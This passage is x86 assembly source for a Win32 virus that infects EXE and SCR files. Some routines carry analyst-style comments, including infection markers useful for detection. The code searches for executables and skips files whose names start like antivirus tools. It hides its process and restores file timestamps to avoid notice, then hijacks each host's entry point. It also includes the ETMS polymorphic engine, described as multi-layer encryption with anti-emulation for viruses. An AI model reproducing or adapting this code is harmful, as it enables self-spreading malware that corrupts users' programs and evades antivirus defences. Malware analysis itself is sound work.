        mov     eax, [edi-4]            ; last three characters + NUL
        and     eax, 0DFDFDFDFh         ; upper-case
        cmp     eax, 'EXE' and 0DFDFDFDFh ; .EXE
        jz      __7
        cmp     eax, 'RCS' and 0DFDFDFDFh ; .SCR
        jnz     __6
__7:
        call    infect_it               ; edx = file name
        push    2000
        call    [ebp.Sleep]
__6:
        popa
__4:
        push    edi
        push    ebx
        push    500
        call    [ebp.Sleep]
        call    [ebp.FindNextFileA]     ; FindNextFileA(ebx, find_str)
        test    eax, eax
        jnz     __2
        push    ebx
        call    [ebp.FindClose]
__1:    ret
|
||
|
||
;-----------------------------------------------------------------------
; hide -- silence error pop-ups and hide the process from the task list.
; In:   ebp = delta, [ebp.k32] = kernel32 base
; SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX |
; SEM_NOOPENFILEERRORBOX) so failures stay silent; then, if kernel32
; exports it, RegisterServiceProcess(GetCurrentProcessId(), 1) -- a
; Windows 9x-only API that removes the process from the Ctrl+Alt+Del list.
; On NT-based systems GetProcAddress returns 0 and that step is skipped.
; Clobbers: eax, ebx.
;-----------------------------------------------------------------------
hide proc

SEM_FAILCRITICALERRORS = 00001h
SEM_NOGPFAULTERRORBOX = 00002h
SEM_NOALIGNMENTFAULTEXCEPT = 00004h
SEM_NOOPENFILEERRORBOX = 08000h

        push    SEM_FAILCRITICALERRORS or SEM_NOGPFAULTERRORBOX or SEM_NOOPENFILEERRORBOX
        call    [ebp.SetErrorMode]
        call    __1                     ; pushes the address of the name below
        db      'RegisterServiceProcess',0
__1:
        push    4 ptr [ebp.k32]
        call    [ebp.GetProcAddress]
        test    eax, eax
        jz      __2                     ; not exported (NT family)
        xchg    eax, ebx
        call    [ebp.GetCurrentProcessId]
        push    1                       ; 1 = register (RSP_REGISTER_SERVICE)
        push    eax
        call    ebx
__2:
        ret
endp
|
||
|
||
; (original header comment lost to mis-encoding) File-name prefixes that infect_it refuses to touch:
|
||
; - _A
|
||
; - VI
|
||
; - UN
|
||
; - SC
|
||
; - NO
|
||
; - AV
|
||
|
||
|
||
;-----------------------------------------------------------------------
; infect_it -- guarded wrapper around infect for one file.
; In:   edx = file name, ebp = delta
; Installs a SEH frame so that a fault inside infect/sfc lands back here
; (esp restored from the record, jmp __1). Skips names whose first two
; characters, upper-cased, are one of _A VI UN SC NO AV (the list above;
; presumably AV and system tools -- the source does not say), skips files
; that sfc reports as protected (eax != 0), otherwise calls infect.
; Clobbers: eax, DF cleared, plus whatever sfc/infect clobber.
;-----------------------------------------------------------------------
infect_it proc
        call    __set_seh               ; comes back here only on an exception
        mov     esp, [esp.8]
        jmp     __1
__set_seh:
        cld
        sub     eax, eax
        push    4 ptr fs:[eax]
        mov     4 ptr fs:[eax], esp
        mov     ax, [edx]               ; first two characters of the name
        and     eax, 0DFDFh             ; upper-case both
        cmp     eax, 'A_' and 0DFDFh    ; "_A"
        jz      __1
        cmp     eax, 'IV' and 0DFDFh    ; "VI"
        jz      __1
        cmp     eax, 'NU' and 0DFDFh    ; "UN"
        jz      __1
        cmp     eax, 'CS' and 0DFDFh    ; "SC"
        jz      __1
        cmp     eax, 'ON' and 0DFDFh    ; "NO"
        jz      __1
        cmp     eax, 'VA' and 0DFDFh    ; "AV"
        jz      __1
        push    edx
        call    sfc ; EAX == 0 -> OK
        pop     edx
        test    eax, eax
        jnz     __1
        call    infect
__1:
        pop     4 ptr fs:[0]            ; unlink the frame
        pop     eax                     ; discard the return address of `call __set_seh`
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; infect -- validate one candidate PE file and hand it to process_it.
; In:   edx = file name, ebp = delta; ebx, ecx, esi, edi are scratch
; Steps: GetFileAttributesA (-1 -> return); clear the attributes
; (SetFileAttributesA(name, 0)), remembering the originals; _lopen with
; OF_READWRITE (2); save the three FILETIMEs on the stack (gettime); read
; the DOS header into [ebp.buffer]; follow e_lfanew (kept in [ebp.word3C])
; and read 0F8h + 8*28h bytes: the PE header (0E0h optional header) plus
; up to 8 section headers.
; Accepted only if: "PE" signature; Characteristics (PE+16h) without
; IMAGE_FILE_DLL (2000h) and with IMAGE_FILE_EXECUTABLE_IMAGE (2); either
; no relocation directory (PE+0A0h) or ImageBase (PE+34h) == 400000h;
; Machine (PE+4) is i386 (low byte and 0F0h == 40h); 2..8 sections; the
; marker bit 10h in the byte at PE+44h (low byte of MajorImageVersion) is
; clear -- it is then set; SectionAlignment (PE+38h) and FileAlignment
; (PE+3Ch) <= 1000h. Saves AddressOfEntryPoint (PE+28h) in host32_1 and
; ImageBase in save_me, zeroes [ebp.buff] and the CheckSum (PE+58h), and
; calls process_it. __close always puts the original FILETIMEs (settime)
; and attributes (fattrs) back and closes the handle.
; Detection notes: infected files carry bit 10h in the low byte of
; MajorImageVersion, a zero PE checksum, and unchanged timestamps and
; attributes. buffer, buff, len_buff, word3C are defined outside this page.
;-----------------------------------------------------------------------
infect proc
        ; edx - name
        call    fattrg                  ; eax = GetFileAttributesA(name)
        cmp     eax, -1
        jnz     __1
__2:
        ret
__1:    sub     ecx, ecx
        xchg    eax, ecx                ; ecx = original attributes, eax = 0
        call    fattrs                  ; clear them (read-only etc.) for writing
        test    eax, eax
        jz      __2
        push    2
        pop     eax                     ; OF_READWRITE
        call    open
        cmp     eax, -1
        xchg    eax, ebx                ; ebx = handle
        jz      __2
        push    ecx                     ; original attributes, restored at the end
        sub     esp, 3*8                ; three FILETIMEs
        mov     esi, esp
        push    edx                     ; name
        call    gettime
        lea     edx, [ebp.buffer]
        push    3Ch+4
        pop     ecx
        call    read                    ; DOS header through e_lfanew
        jc      __close
        cmp     2 ptr [edx], 'ZM'       ; "MZ"
        jnz     __close
        cmp     2 ptr [edx.18h], 40h    ; e_lfarlc >= 40h: new-style header
        jb      __close
        push    edx
        movzx   edx, 2 ptr [edx.3Ch]    ; e_lfanew (low word)
        mov     [ebp.word3C], edx
        call    seek
        pop     edx
        mov     ecx, 0F8h + (28h*8)     ; PE header + 8 section headers
        call    read
        jc      __close
        cmp     2 ptr [edx], 'EP'       ; "PE"
        jnz     __close
        ; dll ? if i process dll then skip
        ; this test
        test    2 ptr [edx.16h], 2000h  ; Characteristics: IMAGE_FILE_DLL
        jnz     __close
        ; can run ?
        test    2 ptr [edx.16h], 0002h  ; IMAGE_FILE_EXECUTABLE_IMAGE
        jz      __close
        ; good image base ?
        cmp     4 ptr [edx.160], 0      ; relocation directory RVA
        jz      __yeeah
        cmp     4 ptr [edx.52], 00400000h       ; ImageBase
        jnz     __close
__yeeah:
        ; intel x86 processor ?
        mov     al, [edx.4]             ; Machine, low byte (014Ch -> 4Ch)
        and     al, 11110000b
        cmp     al, 40h
        jnz     __close
        ; 2..8 sections ?
        cmp     2 ptr [edx.06h], 8
        ja      __close
        cmp     2 ptr [edx.06h], 2
        jb      __close
        ; it's already ?
        test    1 ptr [edx.44h], 16     ; infection marker: bit 4 of MajorImageVersion
        jnz     __close
        or      1 ptr [edx.44h], 16
        ; save EIP
        mov     eax, [edx.28h]          ; AddressOfEntryPoint
        mov     4 ptr [ebp.host32_1], eax
        mov     eax, [edx+52]           ; ImageBase
        mov     [ebp.save_me], eax
        mov     eax, 1000h
        cmp     [edx.38h], eax          ; SectionAlignment
        ja      __close
        cmp     [edx.3Ch], eax          ; FileAlignment
        ja      __close
        lea     edi, [ebp.buff]
        mov     ecx, (len_buff)/4
        sub     eax, eax
        rep     stosd                   ; zero the work buffer
        mov     4 ptr [edx.58h], eax    ; CheckSum = 0
        call    process_it
__close:
        pop     edx                     ; name
        mov     esi, esp
        call    settime                 ; original FILETIMEs back
        add     esp, 3*8
        call    close
        pop     eax
        call    fattrs                  ; original attributes back
        ret
endp
|
||
|
||
process_it proc
|
||
movzx eax, 2 ptr [edx.14h]
|
||
cmp al, 0E0h
|
||
jnz __1
|
||
lea edi, [eax+18h+edx]
|
||
movzx ecx, 2 ptr [edx.6]
|
||
__loop:
|
||
; check file
|
||
mov esi, [edx.28h]
|
||
cmp 4 ptr [edi.0Ch], esi
|
||
ja __4
|
||
push eax
|
||
mov eax, 4 ptr [edi.0Ch]
|
||
add eax, 4 ptr [edi.10h]
|
||
cmp esi, eax
|
||
pop eax
|
||
jb __5
|
||
__4: add edi, 28h
|
||
loop __loop
|
||
jmp __1
|
||
__5: test 1 ptr [edi.27h], 80h
|
||
jnz __1
|
||
mov esi, [edi.12]
|
||
add esi, [edi.16]
|
||
sub esi, [edx.40]
|
||
mov 4 ptr [ebp.__rule_me], size_UEP-4
|
||
cmp esi, size_UEP-4
|
||
ja __b
|
||
sub esi, 4
|
||
mov 4 ptr [ebp.__rule_me], esi
|
||
__b: ; read from IP some bytes
|
||
; for UEP
|
||
lea esi, [eax+18h+edx]
|
||
push edx
|
||
mov eax, [edx.028h]
|
||
sub eax, [edi.0Ch]
|
||
add eax, [edi.14h]
|
||
mov 4 ptr [ebp.forUEP], eax
|
||
xchg eax, edx
|
||
call seek
|
||
lea edx, [ebp.UEP]
|
||
mov ecx, 4 ptr [ebp.__rule_me]
|
||
add ecx, 4
|
||
call read
|
||
pop edx
|
||
jc __1
|
||
movzx eax, 2 ptr [edx.6]
|
||
dec eax
|
||
imul eax, eax, 28h
|
||
add esi, eax
|
||
mov edi, [esi.14h]
|
||
add edi, [esi.10h]
|
||
call fsize
|
||
cmp eax, edi
|
||
jz __2
|
||
push edx
|
||
mov edx, edi
|
||
call seek
|
||
push eax eax
|
||
mov edx, esp
|
||
push 8
|
||
pop ecx
|
||
call read
|
||
pop eax
|
||
pop ecx
|
||
cmp eax, 1
|
||
jnz __not_3
|
||
cmp ecx, 1234567h
|
||
org $-4
|
||
db 10h,1,0,0
|
||
jz __3
|
||
__not_3:
|
||
and eax, 1234567h
|
||
org $-4
|
||
db 0FFh, 0FFh, 0F0h, 0
|
||
cmp eax, 1234567h
|
||
org $-4
|
||
db 'N','B',30h,0
|
||
jz __3
|
||
call fsize
|
||
sub eax, edi
|
||
cmp eax, 100h ; 256 bytes only
|
||
; if yes then skip it ;)
|
||
jb __3
|
||
pop eax
|
||
jmp __1
|
||
__3: mov edx, edi
|
||
call seek
|
||
call truncate
|
||
pop edx
|
||
__2: mov [ebp.flen], edi
|
||
mov eax, [edx.160]
|
||
test eax, eax
|
||
jz __ok
|
||
mov edi, [esi.12]
|
||
cmp eax, edi
|
||
jb __1
|
||
add edi, [esi.16]
|
||
cmp eax, edi
|
||
ja __1
|
||
dec 2 ptr [edx.6]
|
||
push edx
|
||
push 28h
|
||
pop ecx
|
||
sub eax, eax
|
||
mov 4 ptr [edx.160], eax
|
||
mov 4 ptr [edx.164], eax
|
||
mov edx, [esi.20]
|
||
mov edi, esi
|
||
rep stosb
|
||
call seek
|
||
mov [ebp.flen], eax
|
||
call truncate
|
||
mov edx, [ebp.word3C]
|
||
call seek
|
||
lea edx, [ebp.buffer]
|
||
mov ecx, 0F8h + (28h*8)
|
||
call write
|
||
pop edx
|
||
sub esi, 28h
|
||
__ok: cmp 4 ptr [esi.1], 'zniw' ; winz
|
||
jz __1
|
||
or 1 ptr [esi.24h+3], 0C0h
|
||
pusha
|
||
lea eax, [ebp.tbl]
|
||
push eax
|
||
call disasm_init
|
||
add esp, 4
|
||
push 1234567h
|
||
__rule_me equ 2 ptr $-4
|
||
pop ecx
|
||
lea edi, [ebp.UEP]
|
||
sub ebx, ebx
|
||
__find:
|
||
inc ebx
|
||
cmp ebx, (size_UEP-4) / 2
|
||
ja __error
|
||
push edi
|
||
lea eax, [ebp.tbl]
|
||
push eax
|
||
call disasm_main
|
||
add esp, 8
|
||
cmp eax, -1
|
||
jnz __no_error
|
||
__error:
|
||
lea edi, [ebp.UEP]
|
||
jmp __found
|
||
__no_error:
|
||
sub ecx, eax
|
||
jc __error
|
||
lea edx, [ebp.UEP]
|
||
cmp 1 ptr [edi], 0EBh
|
||
jnz __no_EB
|
||
movsx eax, 1 ptr [edi.1]
|
||
push edi
|
||
inc edi
|
||
inc edi
|
||
add edi, eax
|
||
pop eax
|
||
cmp edi, edx
|
||
jb __error
|
||
add edx, 4 ptr [ebp.__rule_me]
|
||
cmp edi, edx
|
||
ja __error
|
||
push edi
|
||
xchg eax, edi
|
||
sub eax, edi
|
||
sub ecx, eax
|
||
pop edi
|
||
jmp __find
|
||
__no_EB:
|
||
cmp 1 ptr [edi], 0E9H
|
||
jz __found
|
||
mov edx, 4 ptr [ebp.__rule_me]
|
||
sub edx, 128
|
||
cmp ecx, edx
|
||
ja __no_E8
|
||
cmp 1 ptr [edi], 0E8h
|
||
jz __found
|
||
__no_E8:
|
||
add edi, eax
|
||
jmp __find
|
||
__found:
|
||
lea ecx, [ebp.UEP]
|
||
mov eax, edi
|
||
sub eax, ecx
|
||
add eax, 4 ptr [ebp.host32_1]
|
||
mov 4 ptr [ebp.host32_2], eax
|
||
mov eax, [edi]
|
||
mov 4 ptr [ebp.saved], eax
|
||
mov al, [edi.4]
|
||
mov 1 ptr [ebp.saved+4], al
|
||
mov al, 0E9h
|
||
stosb
|
||
lea edx, [ebp.UEP]
|
||
mov eax, edi
|
||
dec eax
|
||
sub eax, edx
|
||
neg eax
|
||
add eax, 4 ptr [esi.10h]
|
||
add eax, 4 ptr [esi.0Ch]
|
||
sub eax, 4 ptr [ebp.host32_1]
|
||
sub eax, 5
|
||
stosd
|
||
;;;;;; FUCK
|
||
lea esi, [ebp.extra_data]
|
||
push extra_len
|
||
pop ecx
|
||
mov edi, [ebp.vl_of]
|
||
add edi, offset extra_data - start
|
||
rep movsb
|
||
;;;;;;
|
||
popa
|
||
pusha
|
||
mov esi, [ebp.vl_of]
|
||
lea edi, [ebp.buff+2]
|
||
mov ecx, [ebp.vl_sz]
|
||
; rep movsb
|
||
call engine_serv
|
||
; mov ecx, [ebp.vl_sz]
|
||
; lea edi, [ebp.buff+2]
|
||
mov _EAX, ecx
|
||
mov _EDI, edi
|
||
popa
|
||
dec edi
|
||
dec edi
|
||
mov 2 ptr [edi], 609Ch
|
||
inc eax
|
||
inc eax
|
||
xchg eax, edi
|
||
push eax
|
||
; edi - virus length
|
||
mov eax, edi
|
||
add eax, [edx.3Ch]
|
||
add eax, [esi.10h]
|
||
mov ecx, [edx.3Ch]
|
||
neg ecx
|
||
and eax, ecx
|
||
mov [esi.10h], eax
|
||
cmp [esi.08h], eax
|
||
ja __x
|
||
mov [esi.08h], eax
|
||
__x: mov eax, [esi.08h]
|
||
add eax, [esi.0Ch]
|
||
push eax
|
||
mov ecx, [edx.38h]
|
||
neg ecx
|
||
and eax, ecx
|
||
cmp eax, 4 ptr [esp]
|
||
jae __xxx
|
||
add eax, [edx.38h]
|
||
__xxx:
|
||
mov [edx.50h], eax
|
||
pop eax
|
||
call fsize
|
||
xchg eax, edx
|
||
call seek
|
||
pop edx
|
||
db 0BFh
|
||
flen dd 0
|
||
mov ecx, [esi.10h]
|
||
add ecx, [esi.14h]
|
||
sub ecx, edi
|
||
call write
|
||
mov edx, [ebp.forUEP]
|
||
call seek
|
||
lea edx, [ebp.UEP]
|
||
mov ecx, 4 ptr [ebp.__rule_me]
|
||
add ecx, 4
|
||
call write
|
||
mov edx, [ebp.word3C]
|
||
call seek
|
||
lea edx, [ebp.buffer]
|
||
mov ecx, 0F8h + (28h*8)
|
||
call write
|
||
__1:
|
||
ret
|
||
endp
|
||
|
||
;-----------------------------------------------------------------------
; truncate -- SetEndOfFile(ebx): cut the file at the current position.
; In: ebx = handle. Out: eax = API result; every other register is
; preserved (shares open's n_chk epilogue).
;-----------------------------------------------------------------------
truncate proc
        pushad
        push    ebx
        call    [ebp.SetEndOfFile]
        jmp     n_chk
endp
|
||
|
||
|
||
;-----------------------------------------------------------------------
; fsize -- GetFileSize(ebx, NULL).
; In: ebx = handle. Out: eax = low dword of the size (or the API's error
; value); every other register is preserved (n_chk epilogue).
;-----------------------------------------------------------------------
fsize proc
        pushad
        push    0 ebx
        call    [ebp.GetFileSize]
        jmp     n_chk
endp
|
||
|
||
|
||
;-----------------------------------------------------------------------
; gettime -- GetFileTime(ebx, esi, esi+8, esi+16).
; In:  ebx = handle, esi -> three consecutive FILETIMEs (creation, last
;      access, last write). Out: eax = API result; other registers
;      preserved (n_chk epilogue). infect uses this before writing and
;      settime afterwards, so the timestamps of an infected file do not
;      change.
;-----------------------------------------------------------------------
gettime proc
        pushad
        ; esi - address of the struct
        ;
        ; CONST FILETIME * lpftLastWrite // time the file was last written
        ; CONST FILETIME * lpftLastAccess, // time the file was last accessed
        ; CONST FILETIME * lpftCreation, // time the file was created
        ;
        ; filetime struc
        ; dwLowDateTime dd ?
        ; dwHighDateTime dd ?
        ; ends
        push    esi                     ; lpCreationTime   = esi
        lodsd
        lodsd
        push    esi                     ; lpLastAccessTime = esi+8
        lodsd
        lodsd
        push    esi ebx                 ; lpLastWriteTime  = esi+16, then hFile
        call    [ebp.GetFileTime]
        jmp     n_chk
endp
|
||
|
||
|
||
;-----------------------------------------------------------------------
; settime -- SetFileTime(ebx, esi, esi+8, esi+16): the counterpart of
; gettime. In: ebx = handle, esi -> three FILETIMEs. Out: eax = API
; result; other registers preserved (n_chk epilogue).
;-----------------------------------------------------------------------
settime proc
        pushad
        ; esi - address of the struct
        ;
        ; CONST FILETIME * lpftLastWrite // time the file was last written
        ; CONST FILETIME * lpftLastAccess, // time the file was last accessed
        ; CONST FILETIME * lpftCreation, // time the file was created
        ;
        ; filetime struc
        ; dwLowDateTime dd ?
        ; dwHighDateTime dd ?
        ; ends
        push    esi                     ; lpCreationTime   = esi
        lodsd
        lodsd
        push    esi                     ; lpLastAccessTime = esi+8
        lodsd
        lodsd
        push    esi ebx                 ; lpLastWriteTime  = esi+16, then hFile
        call    [ebp.SetFileTime]
        jmp     n_chk
endp
|
||
|
||
;-----------------------------------------------------------------------
; fattrs -- SetFileAttributesA(edx, eax).
; In: edx = file name, eax = attributes. Out: eax = API result; other
; registers preserved (n_chk epilogue).
;-----------------------------------------------------------------------
fattrs proc
        pushad
        push    eax edx
        call    [ebp.SetFileAttributesA]
        jmp     n_chk
endp
|
||
|
||
;-----------------------------------------------------------------------
; fattrg -- GetFileAttributesA(edx).
; In: edx = file name. Out: eax = attributes, or -1 on failure; other
; registers preserved (n_chk epilogue).
;-----------------------------------------------------------------------
fattrg proc
        pushad
        push    edx
        call    [ebp.GetFileAttributesA]
        jmp     n_chk
endp
|
||
|
||
;-----------------------------------------------------------------------
; open -- _lopen(edx, eax).
; In:  eax = mode (OF_* value), edx = file name.
; Out: eax = file handle, or -1 on failure; other registers preserved.
; n_chk is the shared epilogue for truncate / fsize / gettime / settime /
; fattrs / fattrg / seek as well: it writes the API's eax into the pushad
; frame's eax slot ([esp+1Ch]) so it survives popad.
;-----------------------------------------------------------------------
open proc
        pushad
        ; eax - mode
        ; edx - name
        ;
        ; OF_READ Opens the file for reading only.
        ; OF_READWRITE Opens the file for reading and writing.
        ; OF_WRITE Opens the file for writing only.
        push    eax edx
        call    [ebp._lopen]
n_chk:
        mov     [esp.1Ch], eax          ; eax slot of the pushad frame
        popad
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; close -- CloseHandle(ebx). In: ebx = handle. All registers preserved;
; the API result is discarded (plain popad).
;-----------------------------------------------------------------------
close proc
        pushad
        push    ebx
        call    [ebp.CloseHandle]
        popad
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; write -- WriteFile(ebx, edx, ecx, &written, NULL).
; In:  ebx = handle, edx = buffer, ecx = length.
; Out: eax = bytes written; CF set when that differs from ecx (read's
;      n_check epilogue); other registers preserved.
;-----------------------------------------------------------------------
write proc
        pushad
        push    eax                     ; slot for lpNumberOfBytesWritten
        mov     eax, esp
        push    0
        push    eax
        push    ecx edx ebx
        call    [ebp.WriteFile]
        jmp     n_check
endp
|
||
|
||
;-----------------------------------------------------------------------
; read -- ReadFile(ebx, edx, ecx, &read, NULL).
; In:  ebx = handle, edx = buffer, ecx = length.
; Out: eax = bytes transferred; CF set when that differs from ecx (short
;      read), clear otherwise; other registers preserved.
; n_check is shared with write: it pops the byte count into the pushad
; frame's eax slot, restores the registers and compares against ecx.
;-----------------------------------------------------------------------
read proc
        ; ecx - length
        ; ebx - handle
        ; edx - buffer
        pushad
        push    eax                     ; slot for lpNumberOfBytesRead
        mov     eax, esp
        push    0
        push    eax
        push    ecx edx ebx
        call    [ebp.ReadFile]
n_check:
        pop     eax                     ; bytes transferred
        mov     [esp.1Ch], eax          ; into the pushad frame's eax slot
        popad
        cmp     eax, ecx
        jz      __1
        stc                             ; short transfer
__1:
        ret
endp
|
||
|
||
;-----------------------------------------------------------------------
; seek -- SetFilePointer(ebx, edx, NULL, FILE_BEGIN).
; In: ebx = handle, edx = absolute offset. Out: eax = new position; other
; registers preserved (n_chk epilogue).
;-----------------------------------------------------------------------
seek proc
        pushad
        push    0 0 edx ebx
        call    [ebp.SetFilePointer]
        jmp     n_chk
endp
|
||
|
||
|
||
; Offsets of the registers saved by pusha, relative to esp immediately
; after the pusha (pusha pushes eax, ecx, edx, ebx, esp, ebp, esi, edi, so
; edi ends up at [esp]). They are only right at that exact stack depth; a
; push or call in between shifts every slot by the pushed size.
_EAX EQU 4 PTR [ESP+7*4]
_ECX EQU 4 PTR [ESP+6*4]
_EDX EQU 4 PTR [ESP+5*4]
_EBX EQU 4 PTR [ESP+4*4]
_ESP EQU 4 PTR [ESP+3*4]
_EBP EQU 4 PTR [ESP+2*4]
_ESI EQU 4 PTR [ESP+1*4]
_EDI EQU 4 PTR [ESP+0*4]


save_me dd 0                            ; ImageBase of the file being infected (infect writes it, engine_serv reads it)
|
||
|
||
;-----------------------------------------------------------------------
; engine_serv -- glue around the ETMS polymorphic engine (`engine`, whose
; header and register contract follow below).
; In:   esi = code to encrypt, edi = output, ecx = length, ebp = delta;
;       [ebp.seed], [ebp.vl_sz], [ebp.save_me] (ImageBase of the target);
;       called from inside a pusha frame (see the _EAX.._EDI equates)
; Out:  edi / ecx as returned by engine (pointer and length of the
;       generated decryptor + encrypted body); ebp restored.
; - seed = seed mod (714024+1): the engine header asks for 0..714024
; - GlobalAlloc(0, 25 KiB + vl_sz) as the engine's scratch area (passed
;   in edx through the _EDX slot), freed again after the call
; - engine's EBP = save_me + [eax.10h] + [eax.0Ch] + 2 with eax read via
;   _EBP. Because the call pushed a return address, that slot holds the
;   caller's saved esi -- presumably the target's section header -- giving
;   ImageBase + VirtualAddress + SizeOfRawData + 2, the address the
;   decryptor will run at after its 2-byte pushf/pusha prefix. Inferred
;   from the stack layout; confirm.
;-----------------------------------------------------------------------
engine_serv:
        push    edx ecx
        mov     eax, [ebp.seed]
        mov     ecx, 714024+1
        sub     edx, edx
        div     ecx
        mov     [ebp.seed], edx         ; seed mod 714025
        pop     ecx edx
        mov     eax, _EBP               ; see the note above
        pusha
        mov     eax, 25*1024
        add     eax, [ebp.vl_sz]
        push    eax 0
        call    [ebp.GlobalAlloc]       ; GlobalAlloc(0, 25 KiB + vl_sz)
        mov     _EDX, eax               ; hand the scratch buffer to the engine in edx
        popa
        push    edx ebp
        mov     ebp, [ebp.save_me]
        add     ebp, 4 ptr [eax.10h]
        add     ebp, 4 ptr [eax.0Ch]
        inc     ebp
        inc     ebp
        call    engine
        pop     ebp
        pusha
        push    4 ptr [esp+8*4]         ; the pushed edx = scratch buffer
        call    [ebp.GlobalFree]
        popa
        pop     edx
        ret
|
||
|
||
engine:
|
||
|
||
|
||
;
|
||
; - expressway to my skull -
|
||
; - [ETMS] v0.36 -
|
||
; - b0z0/iKX -
|
||
;
|
||
; This is a polymorphic engine for Win32/Win9X viruses. It should be fully
|
||
; compatible with any 486+ processor. You should check ver. 0.1 (Xine#4)
|
||
; for some more basic information.
|
||
;
|
||
; Changes from v0.1:
|
||
; - Multiple layers of encryption (random from 2 to 7 layers)
|
||
; - New garbage types added (MOVSX, MOVZX, BT family, SET family,
|
||
; XADD, SHLD/SHRD, CMPXCHG, BSWAP, XLAT, ENTER/LEAVE) on regs,
|
||
; mem, flags (when possible). Direct read/write on stack using
|
||
; ESP + offset.
|
||
; - Antiemulation structures (code emulation checks, stack consistency
|
||
; checks, stack segment play, memory consistency on writes)
|
||
; - New ways of incrementing/decrementing pointer/counter, changing
|
||
; encryption key, initializing registers and exiting from loop.
|
||
; - Some minor parts have been rewritten
|
||
;
|
||
; Using the poly:
|
||
; Just add the ETMS source in your virus, simply:
|
||
; include etms.asm
|
||
; Set the registers as described below and then call the poly. The poly uses
|
||
; some data for internal purposes. This data of course is not needed to be
|
||
; carried around with your infected file or whatever. You can just include
|
||
; the ETMS source at the end of the file and then skip the bytes that start
|
||
; from the label _mem_data_start. Of course you'll need to have that free
|
||
; memory placed there at runtime.
|
||
; The random seed (the dd at seed) should be initialized at first poly
|
||
; run to a value between 0 and 714024.
|
||
;
|
||
; Calling parameters:
|
||
; ECX = Length of things to be encrypted
|
||
; ESI = Pointer to what we want to encrypt
|
||
; EDI = Where to place decryptor and encrypted stuff
|
||
; EBP = Offset at which decryptor will run
|
||
; EDX = Some free temporary place for the poly
|
||
; The two needed space zones (EDI and EDX) should be at least 25kb plus
|
||
; the length of your code. Just allocate some mem, you're in Windoze baby!
|
||
;
|
||
; On exit:
|
||
; EDI = Pointer to generated code
|
||
; ECX = Length of generated code (decryptor + encrypted code)
|
||
;
|
||
; Contacts:
|
||
; Email me at cl0wn@geocities.com or query me on irc.
|
||
;
|
||
; Special greetings:
|
||
; I'd like to specially thank StarZero/iKX for the great support and for
|
||
; convincing me to write this. Greetings also to pigpen/s0ftpj for persistent
|
||
; support irl, crazyness roxor! ;), and also greets to claire for making me
|
||
; feel like I thought I could never feel
|
||
;
|
||
; Misc greetings to:
|
||
; The entire iKX and S0ftpj crew and: kernel panic, darkman, gigabyte,
|
||
; jackie-, rucker, talena, benny, inty13, uselessa, reptile, dandler, fusys,
|
||
; jhb, slagehammer, giorgetto, tankie, griyo and gf, vecna, belfa, del0,
|
||
; wintermute, spanska, sepultura, cavallo, milla, ^syren^, claire.
|
||
;
|
||
; - live fast, die young -
|
||
; - written in aug/sept 2000 -
|
||
;
|
||
|
||
engine:
|
||
cld
|
||
push edi
|
||
push edi
|
||
|
||
call poly_delta
|
||
poly_delta:
|
||
pop eax ; where we are running
|
||
sub eax,offset poly_delta
|
||
push ecx
|
||
push eax
|
||
|
||
lea ebx,[offset v_runnin + eax]
|
||
|
||
o_vrun equ offset v_runnin ; save some bytes since off between
|
||
; various data is a 8b
|
||
mov dword ptr [ebx],ebp
|
||
mov dword ptr [ebx - (o_vrun - offset orig_dx)],edx
|
||
mov dword ptr [ebx - (o_vrun - offset layer_nr)],tl_space
|
||
|
||
xor ecx,ecx
|
||
bit_loop:
|
||
inc ecx
|
||
shl ebp,1
|
||
jnc bit_loop ; find higher bit with an 1
|
||
dec ecx ; for random memory offsets
|
||
|
||
mov byte ptr [ebx - (o_vrun - offset t_memand)],cl
|
||
pop ebp ; delta
|
||
|
||
how_manylayers:
|
||
call get_random_al7 ; random number of layers
|
||
cmp al,6 ; from 2 to 7
|
||
jae how_manylayers
|
||
mov ecx,l_space
|
||
mul ecx
|
||
mov dword ptr [ebx - (o_vrun - offset layer_end)],eax
|
||
|
||
pop ecx
|
||
start_layer:
|
||
|
||
o_tini equ offset r_pointer
|
||
lea ebx,[offset r_pointer + ebp]
|
||
; dest, cnt and source
|
||
mov dword ptr [ebx - (o_tini - offset t_inipnt)],edi
|
||
mov dword ptr [ebx - (o_tini - offset v_lenght)],ecx
|
||
mov dword ptr [ebx - (o_tini - offset v_virusp)],esi
|
||
|
||
mov dword ptr [ebx - (o_tini - offset r_pointer)],010ffffffh
|
||
mov dword ptr [ebx - (o_tini - offset t_chgpnt)],01000404h
|
||
|
||
xor eax,eax
|
||
mov dword ptr [ebx - (o_tini - offset t_fromend)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_pntoff)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_cntoff)],eax
|
||
mov dword ptr [ebx - (o_tini - offset w_loopbg)],eax
|
||
mov dword ptr [ebx - (o_tini - offset t_inacall)-2],eax
|
||
inc al
|
||
mov dword ptr [ebx - (o_tini - offset t_exitjmp)],eax
|
||
|
||
push edi ; initialize layer data
|
||
mov ecx,[ebx - (o_tini - offset layer_nr)]
|
||
lea edi,[ebx - (o_tini - offset enc_space) + ecx + 10h]
|
||
; init layers encryptor, regs struct no needed
|
||
mov al,90h ; virgin encryptor
|
||
mov dword ptr [ebx - (o_tini - offset w_encrypt)],edi
|
||
mov ecx,enc_max
|
||
rep stosb
|
||
pop edi
|
||
|
||
call rnd_garbage
|
||
|
||
mov ecx,3
|
||
|
||
mov esi,ebx ; to memory structures
|
||
mov edx,dword ptr [esi - (o_tini - offset layer_nr)]
|
||
; edx has offset in the layer structure
|
||
init_part:
|
||
push ecx
|
||
select_register:
|
||
call get_register ; get a unused register
|
||
xchg ebx,ecx
|
||
|
||
select_block:
|
||
call get_random_al7
|
||
and al,011b
|
||
jz select_block ; select from 01 to 03
|
||
|
||
dec eax
|
||
cmp byte ptr [eax+esi],0ffh ; check if that stage already
|
||
jne select_block ; done
|
||
|
||
mov byte ptr [eax+esi],bl ; save the register for that
|
||
; stage
|
||
or al,al
|
||
jnz not_pointer
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx + 12],edi
|
||
; save offset where the
|
||
jmp assign_next ; pointer is initialized
|
||
|
||
not_pointer:
|
||
dec eax
|
||
jnz not_counter
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset w_counter)],edi
|
||
jmp assign_next ; assign inital counter
|
||
|
||
not_counter:
|
||
|
||
call get_random ; get key
|
||
|
||
mov dword ptr [esi - (offset r_pointer - offset enc_space) + edx],eax
|
||
